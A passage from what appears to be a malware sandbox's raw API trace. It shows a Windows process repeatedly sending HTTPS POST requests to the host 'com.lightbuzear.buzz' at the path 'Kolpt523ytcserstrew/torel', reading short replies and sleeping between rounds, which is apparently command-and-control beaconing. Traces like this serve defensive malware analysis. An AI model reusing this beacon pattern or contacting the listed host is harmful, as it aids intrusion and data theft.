RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0207.217] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482edc0 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed18 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482edc0 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0207.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed18 | out: hHeap=0x4780000) returned 1 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482edc0 [0207.217] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d08 [0207.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d08 | out: hHeap=0x4780000) returned 1 [0207.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0207.218] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0207.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0207.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0207.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0207.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0207.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0207.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed48 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea18 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea18 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a028 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb8d0 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a028 | out: hHeap=0x4780000) returned 1 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d08 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0207.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a028 [0207.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0207.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0207.220] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0207.220] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0207.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a028 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea60 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ecb8 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea60 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0207.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ecb8 | out: hHeap=0x4780000) returned 1 [0207.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a028 [0207.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0207.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0207.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a028 | out: hHeap=0x4780000) returned 1 [0207.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a028 [0207.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0207.222] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d30 [0207.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0207.223] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0207.223] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0207.223] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0208.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d30 | out: hHeap=0x4780000) returned 1 [0208.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0208.212] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0208.212] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eca0 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d30 [0208.213] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0208.213] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0208.216] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d30 | out: hHeap=0x4780000) returned 1 [0208.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d30 [0208.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0208.216] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d58 [0208.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0208.217] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0208.217] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0208.217] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0208.218] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0208.218] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0208.218] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0208.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0208.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0208.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d58 [0208.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0208.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0208.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0208.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829ee8 [0208.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0208.219] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0208.219] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0208.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0208.220] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0208.220] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0208.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0208.220] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0208.220] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0208.220] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0208.220] FreeLibrary (hLibModule=0x71570000) returned 1 [0208.220] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0208.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0208.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0208.221] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0208.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0208.222] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0a0 | out: hHeap=0x4780000) returned 1 [0208.222] Sleep (dwMilliseconds=0x2710) [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed18 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed48 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed18 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0208.258] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed18 [0208.258] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0a0 [0208.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0a0 | out: hHeap=0x4780000) returned 1 [0208.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0208.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0208.259] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0208.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0208.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0208.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0208.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0208.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0208.259] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0208.259] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed30 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed48 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed30 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d58 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0208.260] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0208.260] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0208.269] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0208.270] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0208.270] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0208.270] FreeLibrary (hLibModule=0x71780000) returned 1 [0208.270] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0208.270] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0208.270] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0208.270] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed48 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed78 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0208.271] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed78 | out: hHeap=0x4780000) returned 1 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed78 [0208.271] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0a0 [0208.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0a0 | out: hHeap=0x4780000) returned 1 [0208.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0a0 [0208.272] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0208.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0208.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0208.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0208.272] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0208.272] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0208.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed48 [0208.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0208.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec88 [0208.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed48 | out: hHeap=0x4780000) returned 1 [0208.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0208.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec88 | out: hHeap=0x4780000) returned 1 [0208.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ec58 [0208.273] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d58 [0208.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0208.273] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0208.273] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", 